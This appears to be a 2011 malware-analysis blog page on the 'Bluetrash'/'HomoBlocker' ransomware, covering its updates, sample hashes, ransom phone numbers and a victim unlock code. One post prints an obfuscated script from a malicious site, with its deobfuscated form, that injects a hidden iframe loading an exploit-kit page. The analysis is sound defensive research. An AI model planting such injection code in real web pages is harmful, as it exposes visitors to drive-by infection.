Showing posts with label pornoplayer. Show all posts
Showing posts with label pornoplayer. Show all posts

Tuesday, 22 February 2011

Bluetrash ransomware.. now updated with a bot.



Most of you know this threat as 'bluetrash' or 'porno player'
This malware have appear in April 2010 and currently alway active.
Named 'winAD' because of about box resource which present in both types and using fakes porn site sush as 'SpermTV' or 'EroTube' for distributing the malware.


Unblock codes and tel numbers are stored inside executables.
They do not use cryptor but Winlock code constantly morphing trying to break antivirus signatures, the dropper use the Windows Vista Media Player icon, is packed with UPX and extracts payload Winlock executable to %USERPROFILE%\[Digits]\[Digits].EXE


After few days, some variants appears, like the 'Homoblocker' ransomware, generaly distributed with a fake site coupled with Phoenix Exploit Kit

If we return one month ago, this malware was updated 2 or 3 per day.
Now... according to my malware bot, this ransomware is updated every hours.
And the homoblocker variante seem now not updated anymore.
Concerning the Homoblocker variants, sometime the guys who is under this have made some tests:


These 'tests' have appear on the homoblocker malware server the 03/02/2011 at 21:12:16 P.M (GMT+1) for 3 days with 8 updates in totals.
According to VirusTotal, when i've uploaded a sample, it was only detected by one antivirus.

For Bluetrash, i monitor every change of this ransom like homoblocker, and since one week now.. that become serious with updates and modifications. (some changes have appears like the 'reboot when dropped', Actually he dont do that anymore.)
A rapid calcul: 24*7 = 168 samples per week.
Tiny histogram:


An update error occured sunday 20 at 03:00 A.M (GMT+1)
Malware filesize in the server: 0 bytes, at 04:08 A.M, a new working sample was available.
Bluetrash ransomware is surely updated with a bot now.
Before, updates have occured only the day.. now it's day and night, h24.

Samples from yesterday downloaded every hours, as you can see the MD5 is alway not the same: 


Monitoring center:



Sample are updated every hours but still detected by most of AVs.
Also i want to thanks Crank69, i really appreciate your emails man.

Sunday, 16 January 2011

Trojan.Ransom (HomoBlocker)



This trojan blocker ( MD5: bbbecfd1ff100a2e70cd163b05de177d ) prevents all software execution.
To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.


Number to Call: 9099010810
Number to Call: 9099010759 (thanks to Gmax for this one)
Number to Call: 9629464469
Number to Call: 9629463283
Number to Call: 9629459917
Code to unlock Windows: DNKEYS

HomoBlocker is a variant of pornoplayer
HomoBlocker was already analyzed on the past: here (15 Jan 2k11)

Short website analyze ~

"fuck.js" contain:
var _0x11f3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x2F\x6B\x61\x6C\x2F\x61\x6E\x65\x74\x64\x71\x79\x6F\x63\x75\x65\x76\x65\x6D\x63\x33\x2E\x70\x68\x70\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];document[_0x11f3[2]](_0x11f3[1])[_0x11f3[0]]=_0x11f3[3];

When deobfuscated:
document['getElementById']('clear_block')['innerHTML'] = '<iframe src="/kal/anetdqyocuevemc3.php" width="1" height="1" scrolling="no" frameborder="0"></iframe>';

The "/kal/anetdqyocuevemc3.php" was a file from Phoenix Exploit Kit



Saturday, 15 January 2011

Trojan.Ransom (HomoBlocker)



This trojan blocker ( MD5: 6c9e94b43e649053291353d390227727 ) prevents all software execution.
To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.


Number to Call: 9629456907
Number to Call: 9645213490
Code to unlock Windows: DNKEYS

HomoBlocker is a variant of pornoplayer